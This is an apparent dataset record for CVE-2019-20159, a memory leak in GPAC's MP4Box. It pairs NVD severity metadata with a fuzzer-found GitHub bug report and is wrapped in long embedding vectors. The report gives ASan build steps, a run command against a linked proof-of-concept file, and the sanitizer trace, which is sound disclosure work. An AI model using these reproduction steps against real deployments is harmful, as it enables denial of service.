0.02420201525092125, 0.016781870275735855, 0.002142886631190777, -0.0021880397107452154, -0.0014749984256923199, 0.0017713150009512901, 0.019190030172467232, 0.017112990841269493, -0.025180330500006676, -0.0017261620378121734, 0.0011890293098986149, 0.01736885868012905, 0.007924353703856468, 0.0024947039783000946, 0.00600535050034523, 0.012116058729588985, -0.011378559283912182, -0.018061205744743347, 0.030613742768764496, -0.013899601995944977, -0.027723949402570724, -0.0028389955405145884, -0.004993170499801636, -0.01147639099508524, 0.00815011840313673, 0.016435695812106133, 0.009181112051010132, -0.00012417077959980816, 0.0004157839866820723, 0.02477395348250866, 0.021899210289120674, 0.006543423980474472, -0.008842464536428452, 0.017504317685961723, 0.04102903604507446, -0.015412228181958199, -0.01572829857468605, -0.013229832984507084, 0.011754834093153477, 0.00123324163723737, 0.005049611907452345, -0.016074473038315773, 0.017007634043693542, -0.0014834646135568619, -0.022425996139645576, 0.011521543376147747, 0.012469757348299026, 0.001911477535031736, 0.01565304398536682, 0.009256367571651936, 0.004714726936072111, -0.02051451802253723, -0.026188747957348824, 0.008691954426467419 ]
97
CVE-2019-20159
2019-12-31T00:15:12.243000
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a memory leak in dinf_New() in isomedia/box_code_base.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1321" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1321
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (master 6ada10e) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-memory-leak ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/POC-memory-leak ASAN info: ```C ==26273==ERROR: LeakSanitizer: detected memory leaks Direct leak of 80 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xad2eed in dinf_New isomedia/box_code_base.c:945 Indirect leak of 160 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02961 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98961) #1 0x46c43a in realloc_chain utils/list.c:622 #2 0x46c43a in gf_list_add utils/list.c:629 Indirect leak of 96 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xad1d0d in url_New isomedia/box_code_base.c:575 Indirect leak of 80 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xad318d in dref_New isomedia/box_code_base.c:1005 Indirect leak of 32 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x46c27d in gf_list_new utils/list.c:602 SUMMARY: AddressSanitizer: 448 byte(s) leaked in 10 allocation(s). ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com)
AddressSanitizer: a memory leak of dinf_New()
https://api.github.com/repos/gpac/gpac/issues/1321/comments
2
2019-10-28T16:03:11
2020-01-08T12:43:28Z
https://github.com/gpac/gpac/issues/1321
513,400,465
1,321
true
This is a GitHub Issue repo:gpac owner:gpac Title : AddressSanitizer: a memory leak of dinf_New() Issue date: --- start body --- System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (master 6ada10e) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-memory-leak ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/POC-memory-leak ASAN info: ```C ==26273==ERROR: LeakSanitizer: detected memory leaks Direct leak of 80 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xad2eed in dinf_New isomedia/box_code_base.c:945 Indirect leak of 160 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02961 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98961) #1 0x46c43a in realloc_chain utils/list.c:622 #2 0x46c43a in gf_list_add utils/list.c:629 Indirect leak of 96 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xad1d0d in url_New isomedia/box_code_base.c:575 Indirect leak of 80 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xad318d in dref_New isomedia/box_code_base.c:1005 Indirect leak of 32 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x46c27d in gf_list_new utils/list.c:602 SUMMARY: AddressSanitizer: 448 byte(s) leaked in 10 allocation(s). ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com) --- end body ---
1,983
[ -0.041972242295742035, 0.04615168273448944, -0.013360867276787758, -0.010663499124348164, 0.020141340792179108, 0.010915450751781464, -0.02965623512864113, 0.030560297891497612, -0.00907027255743742, 0.018896400928497314, -0.026425320655107498, -0.003086412325501442, -0.005791191477328539, -0.007373301777988672, 0.025046994909644127, 0.0059801554307341576, -0.02644014172255993, 0.02509145624935627, 0.026662452146410942, -0.024513449519872665, 0.021593770012259483, -0.02660316973924637, -0.01914835348725319, 0.016080467030405998, -0.0022935043089091778, 0.01969671994447708, 0.005628163460642099, 0.004601829685270786, -0.01935584284365177, 0.05133892968297005, 0.01246421504765749, 0.027403486892580986, -0.011056247167289257, -0.011989952065050602, 0.010737602598965168, -0.004064579028636217, 0.06449971348047256, 0.06621892005205154, 0.023787233978509903, 0.01862962916493416, -0.0023175880778580904, -0.0427725613117218, -0.04914546385407448, 0.0048352559097111225, 0.007436289917677641, -0.0023768709506839514, 0.018259111791849136, 0.008395930752158165, -0.02815934270620346, 0.002449121791869402, 0.019103892147541046, -0.02970069646835327, -0.017251303419470787, -0.07042799890041351, 0.009136965498328209, -0.0000921662722248584, 0.021475205197930336, 0.021326998248696327, 0.02286835014820099, 0.027922211214900017, 0.012745807878673077, 0.028055598959326744, 0.0027399782557040453, 0.018244290724396706, 0.026039982214570045, 0.013983337208628654, -0.022290343418717384, 0.01364246103912592, 0.004486969206482172, 0.023001737892627716, 0.009196248836815357, -0.029211614280939102, -0.023861339315772057, 0.044699251651763916, 0.02221623994410038, -0.024113290011882782, 0.024720938876271248, 0.03278340399265289, -0.01750325597822666, 0.02257193624973297, -0.04798945039510727, 0.04855263605713844, -0.010922861285507679, 0.012679114937782288, -0.00393860274925828, 0.04102371633052826, -0.025728747248649597, -0.06764170527458191, 0.012027003802359104, -0.041794393211603165, 0.024632014334201813, 0.017177199944853783, 0.009492662735283375, -0.030071213841438293, 0.007691946811974049, 0.019592974334955215, -0.0464184544980526, -0.00775122968479991, -0.04455104470252991, -0.019222456961870193, -0.05495518073439598, -0.045381005853414536, 0.00453513627871871, 0.012130748480558395, -0.003306870348751545, 0.03405798599123955, 0.008647882379591465, -0.04748554527759552, -0.007239915430545807, 0.1375361680984497, 0.03168667107820511, -0.01084134727716446, -0.018911221995949745, 0.042476147413253784, 0.006335852202028036, 0.04677415266633034, -0.007002783939242363, -0.0030752967577427626, -0.05193175747990608, -0.01765146292746067, -0.00045990507351234555, -0.03411726653575897, -0.02153448760509491, 0.007617843337357044, -0.012516086921095848, 0.05510338768362999, 0.010204057209193707, -0.012575370259582996, -0.031449541449546814, -0.015650667250156403, -0.03954164683818817, -0.02965623512864113, 0.010270750150084496, -0.030827071517705917, -0.0049612317234277725, -0.015124531462788582, 0.003920076880604029, 0.05302849039435387, -0.007239915430545807, 0.01916317455470562, -0.05815645307302475, -0.0481969378888607, 0.03645893931388855, -0.012175210751593113, -0.02187536284327507, -0.02629193477332592, -0.014131544157862663, 0.05276171863079071, -0.026188189163804054, -0.00822549220174551, 0.0063247368671, -0.018570346757769585, 0.020808272063732147, 0.00036658093449659646, 0.029256075620651245, -0.0035384437069296837, 0.004572188016027212, 0.03865240514278412, -0.009425969794392586, 0.01729576475918293, -0.02835201285779476, -0.0017784849042072892, -0.01679186150431633, -0.03296125307679176, -0.021163970232009888, -0.03272411972284317, 0.01152309961616993, 0.02218659780919552, 0.005806012079119682, 0.020941659808158875, 0.0036847982555627823, 0.014457600191235542, 0.007150991354137659, 0.04259471222758293, -0.04235758259892464, -0.007132465485483408, 0.03183487802743912, 0.0179775170981884, -0.011285968124866486, 0.0025324884336441755, 0.013783257454633713, 0.026336396113038063, -0.017770027741789818, 0.004164618905633688, 0.018036801367998123, -0.026692094281315804, 0.0179775170981884, -0.04873048514127731, 0.014553934335708618, -0.03287232667207718, -0.01508747972548008, -0.02221623994410038, -0.006220991723239422, -0.002508404664695263, 0.05851215124130249, 0.003266113344579935, -0.012479035183787346, 0.027403486892580986, -0.03067886456847191, -0.009477842599153519, 0.007699357345700264, -0.015635846182703972, -0.007569676265120506, -0.00040201167576014996, -0.04069766029715538, -0.00012458657147362828, -0.024157753214240074, 0.06740457564592361, 0.01211592834442854, -0.0252989474684, -0.012686525471508503, -0.01525050774216652, -0.004068284295499325, -0.01885193958878517, -0.004890833515673876, 0.0049019488506019115, -0.008003181777894497, 0.004438801668584347, -0.005924577824771404, -0.026840301230549812, 0.009440790861845016, -0.011004375293850899, 0.02083791419863701, 0.004675933159887791, -0.016539908945560455, -0.01170835830271244, 0.0034976869355887175, 0.013153377920389175, -0.036221809685230255, 0.002962288912385702, 0.02544715441763401, -0.02103058248758316, 0.008121747523546219, 0.014198237098753452, 0.014857758767902851, -0.0010559753281995654, -0.01646580547094345, -0.017192021012306213, -0.007936488837003708, 0.020645244047045708, 0.008018002845346928, 0.04523279890418053, 0.002184201730415225, -0.002869659336283803, 0.000275804108241573, 0.049916140735149384, -0.02034883014857769, 0.0009689037105999887, -0.0034569299314171076, 0.03133097290992737, 0.035717904567718506, -0.028529861941933632, -0.0008299595792777836, -0.03408762812614441, 0.007632663939148188, -0.011056247167289257, 0.043987859040498734, 0.022942453622817993, -0.022601578384637833, -0.035036150366067886, 0.004235017113387585, -0.03177559748291969, -0.007328839506953955, -0.006584099028259516, -0.030827071517705917, -0.009522303938865662, 0.003875614842399955, 0.032842688262462616, 0.01593226008117199, 0.009040631353855133, 0.01648062653839588, -0.00015307011199183762, -0.007817923091351986, -0.024320781230926514, -0.020778631791472435, -0.002930794842541218, -0.023149944841861725, -0.002302767476066947, -0.00224718963727355, -0.02122325263917446, 0.009055452421307564, 0.005150195676833391, -0.014791065827012062, 0.025654643774032593, -0.004331351723521948, 0.026840301230549812, -0.0012106664944440126, -0.004787088371813297, -0.0032383245415985584, 0.016421344131231308, 0.0034384040627628565, 0.017206840217113495, -0.040104832500219345, 0.03334658965468407, -0.0014533555367961526, 0.015154172666370869, -0.0023546398151665926, -0.010707960464060307, -0.017014171928167343, 0.00653222668915987, -0.020037595182657242, 0.00432764645665884, -0.016080467030405998, -0.023312972858548164, -0.019785644486546516, 0.019800465553998947, -0.04324682429432869, 0.021149149164557457, -0.0024417114909738302, 0.010337443090975285, 0.03648858144879341, -0.061831988394260406, -0.017251303419470787, -0.010433778166770935, -0.008210672065615654, -0.00010907113755820319, -0.019578153267502785, -0.03269448131322861, -0.016510266810655594, 0.02525448426604271, -0.018511062487959862, 0.027581335976719856, -0.023461179807782173, 0.00470186909660697, 0.008010592311620712, 0.014783655293285847, -0.020956479012966156, 0.01865926943719387, -0.06135772913694382, 0.017755206674337387, -0.014027799479663372, -0.013249712064862251, 0.014850348234176636, -0.0329316109418869, 0.0013014433206990361, -0.024128111079335213, 0.006761947646737099, 0.020482217893004417, 0.013983337208628654, -0.01645098440349102, -0.0029919303487986326, -0.02088237553834915, -0.012656884267926216, -0.019266918301582336, -0.013153377920389175, 0.002669579815119505, -0.01646580547094345, -0.00661374069750309, -0.007206568960100412, -0.0018312835600227118, 0.0009837244870141149, 0.025699106976389885, 0.036696068942546844, 0.033494796603918076, 0.023179585114121437, 0.019622616469860077, -0.015635846182703972, -0.02237926796078682, -0.005513302981853485, -0.017429150640964508, -0.014353854581713676, -0.029107868671417236, 0.004227606579661369, 0.024039186537265778, 0.014094492420554161, 0.014583575539290905, -0.025891775265336037, -0.017844131216406822, -0.002165675861760974, -0.013590588234364986, -0.004987168125808239, 0.05714864656329155, -0.02036365121603012, 0.009514894336462021, 0.026380859315395355, -0.029300536960363388, 0.045381005853414536, 0.030382448807358742, -0.026232652366161346, -0.0007993918843567371, 0.002788145560771227, 0.01762182079255581, 0.028959661722183228, -0.025536078959703445, 0.02186054363846779, 0.03016013838350773, -0.009492662735283375, 0.06615963578224182, 0.008551548235118389, -0.023861339315772057, -0.07173222303390503, 0.02614372782409191, -0.04235758259892464, -0.025565719231963158, -0.042831841856241226, 0.027344204485416412, -0.016213852912187576, -0.04970865324139595, 0.03302053362131119, -0.0819881483912468, 0.03565862029790878, -0.01864445023238659, -0.01416118536144495, 0.009714973159134388, -0.014568755403161049, 0.03714069351553917, 0.005983860697597265, -0.008581189438700676, 0.05065717548131943, -0.010404136031866074, 0.01833321526646614, -0.023861339315772057, -0.03865240514278412, 0.002923384541645646, 0.04609239846467972, 0.034858301281929016, -0.015621025115251541, 0.0009642722434364259, -0.02406882867217064, 0.051635343581438065, -0.01366469170898199, 0.007840153761208057, 0.018540704622864723, 0.03287232667207718, 0.03642929717898369, 0.022305164486169815, 0.0044610328041017056, 0.006939796265214682, 0.001381104695610702, -0.02713671512901783, -0.019548512995243073, 0.012753218412399292, -0.0006465533515438437, -0.005720792803913355, 0.014050030149519444, -0.056881874799728394, -0.05700043961405754, -0.05818609520792961, -0.012190031819045544, -0.03219057619571686, -0.02595105767250061, -0.0045795985497534275, -0.020408114418387413, 0.011797282844781876, 0.025639822706580162, -0.0729178786277771, -0.015991542488336563, -0.018259111791849136, 0.012012182734906673, -0.02153448760509491, -0.01880747638642788, 0.007258441299200058, 0.008936886675655842, -0.035540055483579636, 0.008262543939054012, -0.0035829059779644012, -0.009966925717890263, -0.0071287602186203, 0.024824684485793114, 0.005806012079119682, -0.01018182560801506, 0.031449541449546814, -0.02663281001150608, 0.010226287879049778, 0.0019507756223902106, 0.05812681466341019, -0.024187393486499786, -0.018096083775162697, 0.005127964541316032, -0.00014589133206754923, 0.04203152656555176, 0.023861339315772057, -0.001642319606617093, -0.002988225081935525, -0.02137145958840847, 0.031983084976673126, 0.02033401094377041, -0.0363403744995594, 0.009025810286402702, -0.05528123676776886, -0.022853530943393707, 0.00872198585420847, -0.008484854362905025, 0.011908438056707382, -0.000351065507857129, -0.01865926943719387, -0.013168198056519032, 0.018703732639551163, -0.003371710889041424, 0.009048041887581348, 0.024898787960410118, 0.007854974828660488, 0.008581189438700676, -0.010833936743438244, 0.005061271600425243, -0.011863975785672665, -0.01932620257139206, -0.014309392310678959, 0.01579887419939041, -0.01084134727716446, 0.0067137801088392735, -0.061298444867134094, 0.0020748989190906286, -0.026321575045585632, 0.011197044514119625, -0.028040777891874313, -0.015635846182703972, 0.028381653130054474, -0.00805505458265543, -0.0029789621476083994, -0.03287232667207718, -0.025195201858878136, 0.003510654903948307, -0.02729974314570427, -0.012212262488901615, -0.017562538385391235, 0.01760699972510338, 0.012316007167100906, 0.012597600929439068, 0.01322748139500618, -0.010196646675467491, -0.007228800095617771, -0.008759037591516972, 0.016865964978933334, -0.01058939564973116, 0.009492662735283375, 0.018214648589491844, -0.003923782147467136, 0.06177270784974098, -0.008462623693048954, 0.015576562844216824, 0.0008369067800231278, -0.008862783201038837, 0.03050101548433304, -0.001360726193524897, 0.008373699150979519, 0.0119529003277421, 0.03236842527985573, -0.032635197043418884, 0.013005170039832592, -0.040430888533592224, 0.0278184674680233, -0.003532886039465666, 0.020096879452466965, -0.020941659808158875, 0.014991145581007004, 0.0024787632282823324, 0.0135609470307827, 0.006132067646831274, -0.009411148726940155, 0.000375843868823722, -0.015369073487818241, -0.0174736138433218, 0.03236842527985573, -0.008507085964083672, 0.0078031024895608425, -0.022497832775115967, 0.00813656859099865, 0.011508279480040073, 0.01187138631939888, -0.0031419899314641953, 0.010796885006129742, -0.0009929874213412404, -0.03562897816300392, -0.022823888808488846, 0.011382303200662136, 0.018392497673630714, 0.017903413623571396, -0.03186452016234398, -0.02543233335018158, 0.01018182560801506, -0.018214648589491844, 0.035540055483579636, -0.021608591079711914, -0.015235686674714088, 0.00021188979735597968, 0.009366686455905437, 0.005150195676833391, -0.015235686674714088, -0.0383559912443161, 0.01981528475880623, -0.05193175747990608, -0.007110234349966049, 0.023683490231633186, 0.004242427181452513, -0.02372795157134533, 0.007147286087274551, 0.010478239506483078, 0.0015543216140940785, -0.016569551080465317, 0.013242301531136036, -0.005876410286873579, -0.013486843556165695, -0.01579887419939041, 0.004916769452393055, 0.00916660763323307, -0.002126771491020918, -0.007943899370729923, 0.030589940026402473, 0.004290594719350338, -0.017266124486923218, 0.04123120754957199, -0.0006873102975077927, -0.040253039449453354, -0.03918594866991043, 0.007251030765473843, 0.021667873486876488, -0.010737602598965168, -0.02052667923271656, 0.018940864130854607, 0.0035754956770688295, 0.02343153767287731, 0.052969206124544144, -0.0031568105332553387, 0.013257122598588467, -0.007395532913506031, 0.0355696976184845, 0.00984835997223854, -0.018555525690317154, 0.025358229875564575, 0.017844131216406822, -0.01830357313156128, 0.021816080436110497, -0.02697368711233139, 0.0032994598150253296, 0.013346047140657902, -0.002426890889182687, -0.01659919135272503, -0.0059023466892540455, -0.008247723802924156, -0.012530907988548279, 0.02206803299486637, 0.012708756141364574, -0.011152582243084908, -0.02562500163912773, 0.008781269192695618, 0.03814850002527237, 0.01374620571732521, -0.012012182734906673, -0.024706117808818817, -0.01612492837011814, 0.0025788031052798033, -0.019370663911104202, -0.007862385362386703, -0.017073454335331917, 0.0025324884336441755, -0.004279479384422302, 0.001463544787839055, -0.006761947646737099, 0.027625797316432, -0.037407465279102325, -0.0010263340082019567, -0.00393860274925828, 0.008885013870894909, 0.0407569445669651, 0.007143580820411444, 0.054184503853321075, 0.030412090942263603, 0.019563334062695503, 0.010018797591328621, 0.014301982708275318, -0.03067886456847191, -0.0129014253616333, -0.016169391572475433, 0.004031232092529535, 0.010633856989443302, -0.02999711036682129, 0.003266113344579935, 0.004097925499081612, -0.006269159261137247, 0.0021341817919164896, -0.013375688344240189, 0.00875162798911333, 0.011878796853125095, -0.014376086182892323, -0.018407318741083145, -0.018792657181620598, 0.011167402379214764, -0.0397491380572319, -0.011159992776811123, -0.016139749437570572, -0.011411944404244423, 0.012953298166394234, -0.0015348694287240505, -0.026869941502809525, 0.014005567878484726, 0.014583575539290905, -0.0002338892809348181, -0.017429150640964508, -0.020422933623194695, 0.0310345608741045, -0.0126494737342, 0.03930451348423958, 0.01661401242017746, 0.0011198896681889892, -0.034502606838941574, 0.0043832240626215935, -0.0013690628111362457, -0.004727805498987436, 0.006717485375702381, -0.025002533569931984, 0.022260701283812523, 0.007510393392294645, -0.024394884705543518, 0.009255531243979931, 0.011775052174925804, -0.011826924048364162, -0.0017423593671992421, 0.030308345332741737, 0.0004629155155271292, -0.023698311299085617, 0.02273496426641941, -0.018525883555412292, 0.019459588453173637, -0.02135663852095604, -0.0028974481392651796, -0.006484059151262045, -0.013657281175255775, 0.0051390803419053555, -0.001463544787839055, -0.02664763107895851, -0.018081262707710266, -0.02292763441801071, -0.02830754965543747, 0.0036014318466186523, -0.003551411908119917, 0.0036810932215303183, 0.012130748480558395, 0.0001916271139634773, 0.011938079260289669, -0.03088635392487049, -0.020274726673960686, 0.010374494828283787, 0.024320781230926514, -0.010137363336980343, -0.004109040834009647, 0.007380712311714888, 0.014783655293285847, 0.019533691927790642, 0.01968189887702465, -0.025180380791425705, 0.013257122598588467, 0.003916371613740921, -0.01457616500556469, 0.0010606067953631282, -0.002827049931511283, 0.009885411709547043, 0.0014515030197799206, -0.01865926943719387, 0.0174736138433218, 0.007043540943413973, 0.0007160254172049463, 0.0078031024895608425, -0.031271692365407944, -0.013820309191942215, -0.005531828850507736, 0.032486990094184875, -0.027581335976719856, 0.002765914425253868, -0.0027121894527226686, 0.00010559753718553111, 0.004260953515768051, -0.010959913022816181, 0.00661374069750309, -0.014153774827718735, -0.0070954132825136185, 0.02507663704454899, -0.028411295264959335, 0.010715370997786522, 0.006502585019916296, 0.009966925717890263, -0.011671306565403938, -0.029626592993736267, 0.0020119110122323036, 0.0006423850427381694, -0.004064579028636217, 0.02292763441801071, 0.0508350245654583, 0.012605011463165283, 0.0027547988574951887, -0.008766448125243187, 0.036370016634464264, -0.04274291917681694, 0.018021980300545692, 0.029448745772242546, 0.0018322098767384887, 0.03660714626312256, -0.01339791901409626, -0.008647882379591465, 0.010656088590621948, 0.010107722133398056, 0.01136007159948349, 0.0383559912443161, -0.047930166125297546, -0.014731782488524914, -0.02405400760471821, 0.0135609470307827, -0.0028937431052327156, -0.02443934604525566, -0.03136061504483223, 0.0007526140543632209, 0.021326998248696327, -0.014694730751216412, -0.04884904995560646, -0.017384689301252365, -0.002521372865885496, -0.012560549192130566, 0.046744510531425476, -0.03779280185699463, 0.010567164048552513, -0.0010874693980440497, -0.003669977653771639, 0.03186452016234398, -0.020274726673960686, 0.016569551080465317, -0.02935982123017311, 0.01897050440311432, -0.012212262488901615, -0.0021971699316054583, -0.0025380461011081934, -0.02885591611266136, 0.008069874718785286, 0.015383893623948097, -0.035540055483579636, 0.008825731463730335, 0.010870988480746746, 0.04226865619421005, 0.006521110888570547, 0.026188189163804054, 0.023653848096728325, -0.02935982123017311, 0.001204182393848896, 0.007113939616829157, 0.0218901839107275, 0.003927487414330244, 0.017192021012306213, 0.006447007413953543, 0.018896400928497314, -0.017873773351311684, 0.03850419819355011, -0.01763664186000824, -0.011145171709358692, 0.003508802503347397, -0.023179585114121437, -0.013842540793120861, -0.03868204727768898, -0.00011005532724084333, -0.0027399782557040453, -0.007221389561891556, 0.010381905362010002, 0.015872977674007416, 0.028870737180113792, 0.015117120929062366, 0.00017726955411490053, -0.01390923373401165, 0.0004367477085907012, -0.013924053870141506, -0.014783655293285847, 0.04437319561839104, -0.006950911600142717, 0.039423082023859024, 0.028188984841108322, 0.0039423080161213875, 0.006172824651002884, -0.008121747523546219, -0.00412015663459897, -0.021149149164557457, -0.04615168273448944, 0.0258028507232666, -0.01883711852133274, -0.02154930867254734, -0.027848107740283012, 0.013649871572852135, 0.013338636606931686, -0.01213815901428461, -0.018866760656237602, 0.01102660596370697, -0.0030363923870027065, -0.006976848002523184, 0.013761026784777641, -0.02002277597784996, 0.012456804513931274, 0.0012180769117549062, -0.004850076511502266, 0.027744363993406296, -0.03159774839878082, -0.014250109903514385, -0.020482217893004417, -0.03462117165327072, -0.00665820250287652, 0.009611228480935097, 0.0017896003555506468, -0.04481781646609306, -0.010715370997786522, 0.013961105607450008, 0.03260555490851402, -0.019429946318268776, -0.005691151600331068, -0.009033220820128918, -0.005917167291045189, -0.012590190395712852, -0.002047110116109252, 0.0072325048968195915, -0.018066441640257835, -0.029937827959656715, 0.0020915723871439695, 0.03770387917757034, -0.012167800217866898, -0.034561887383461, 0.008432982489466667, 0.008455213159322739, 0.009270352311432362, -0.011997362598776817, -0.04798945039510727, -0.021845722571015358, 0.012679114937782288, -0.03462117165327072, 0.019741181284189224, -0.015383893623948097, 0.04612204059958458, 0.02526930533349514, -0.006550752557814121, -0.020052416250109673, 0.011330430395901203, 0.0009295362397097051, -0.005869000218808651, -0.021149149164557457, 0.01135266199707985, -0.011197044514119625, 0.009425969794392586, -0.009463021531701088, -0.01110811997205019, -0.006721190642565489, 0.005165016278624535, 0.026588348671793938, 0.004279479384422302, -0.03521399945020676, 0.004272068850696087, 0.0040201167576014996, -0.016362059861421585, -0.00525394082069397, 0.031153125688433647, 0.016539908945560455, 0.014879989437758923, 0.0012347501469776034, 0.014064851216971874, -0.007136170286685228, -0.024365242570638657, -0.021949466317892075, -0.021134328097105026, -0.02426149696111679, -0.028796633705496788, -0.020422933623194695, -0.015739591792225838, -0.018051620572805405, 0.027685081586241722, -0.006535931956022978, -0.014679910615086555, 0.009048041887581348, 0.024987712502479553, 0.018911221995949745, 0.013242301531136036, -0.01127114798873663, -0.009685331955552101, 0.019578153267502785, 0.015220866538584232, -0.03699248656630516, 0.026840301230549812, -0.028292730450630188, -0.014628037810325623, -0.0041386825032532215, -0.0013551684096455574, 0.020645244047045708, 0.01659919135272503, 0.021653052419424057, 0.021786440163850784, -0.014109313488006592, -0.03239806741476059, -0.005572585854679346, 0.005565175320953131, -0.022082854062318802, 0.0019785643089562654, 0.03521399945020676, -0.018451780080795288, -0.030649222433567047, -0.017399510368704796, 0.0016386144561693072, 0.013212660327553749, -0.004372108727693558, 0.008959117345511913, 0.012167800217866898, 0.002886332804337144, 0.006261748727411032, -0.031301334500312805, 0.001363505027256906, 0.000045591041271109134, -0.02239408902823925, -0.025328587740659714, -0.024305960163474083, -0.012278955429792404, -0.004483263939619064, -0.03423583507537842, -0.007936488837003708, -0.01711791753768921, -0.012945887632668018, -0.015443176962435246, 0.021993929520249367, 0.011397123336791992, -0.035540055483579636, 0.01981528475880623, -0.019192814826965332, 0.011723179370164871, 0.02137145958840847, -0.005031629931181669, 0.0037199973594397306, -0.024854326620697975, -0.0237131305038929, 0.006817525252699852, -0.006580393761396408, 0.023683490231633186, -0.017592178657650948, -0.0006562794442288578, -0.025224843993782997, 0.030441733077168465, 0.013383098877966404, 0.028752172365784645, 0.003343922086060047, 0.013242301531136036, 0.029300536960363388, 0.01935584284365177, 0.0044943792745471, 0.023298151791095734, 0.015369073487818241, 0.0034828661009669304, -0.007247325964272022, -0.029093047603964806, 0.016717758029699326, -0.01965225674211979, -0.02817416377365589, -0.005913462024182081, 0.0218901839107275, -0.008796089328825474, -0.036903560161590576, -0.029759978875517845, -0.0005228930967859924, 0.002228663768619299, 0.016569551080465317, -0.004412865731865168, 0.02052667923271656, 0.002906711073592305, -0.0010874693980440497, -0.012975528836250305, 0.06598179042339325, -0.002106392988935113, -0.017873773351311684, -0.0046462914906442165, 0.017695924267172813, 0.0027325679548084736, 0.006917565129697323, -0.01966707780957222, -0.00449067447334528, -0.007247325964272022, 0.013716564513742924, -0.01830357313156128, -0.01212333794683218, -0.027418307960033417, 0.003232766641303897, 0.013761026784777641, 0.003673682687804103, 0.022823888808488846, 0.0032179460395127535, 0.012864373624324799, -0.0009406517492607236, -0.01575441099703312, 0.032842688262462616, -0.025536078959703445, -0.0034828661009669304, -0.004735216032713652, -0.0034235832281410694, -0.005376211367547512, 0.0012347501469776034, -0.012538318522274494, -0.012041824869811535, 0.03278340399265289, -0.04461032897233963, 0.010908040218055248, 0.0015672898152843118, -0.031983084976673126, 0.006917565129697323, -0.014465009793639183, -0.012130748480558395, -0.027418307960033417, 0.009514894336462021, -0.03352443873882294, -0.016851143911480904, -0.004223901312798262, 0.012671704404056072, 0.059934940189123154, 0.013546125963330269, -0.005094618070870638, -0.003214240772649646, 0.013538716360926628, 0.02304619923233986, 0.00004923832602798939, 0.01136007159948349, -0.004649996757507324, 0.015621025115251541, 0.022853530943393707, 0.017770027741789818, 0.00030451922793872654, -0.013220070861279964, 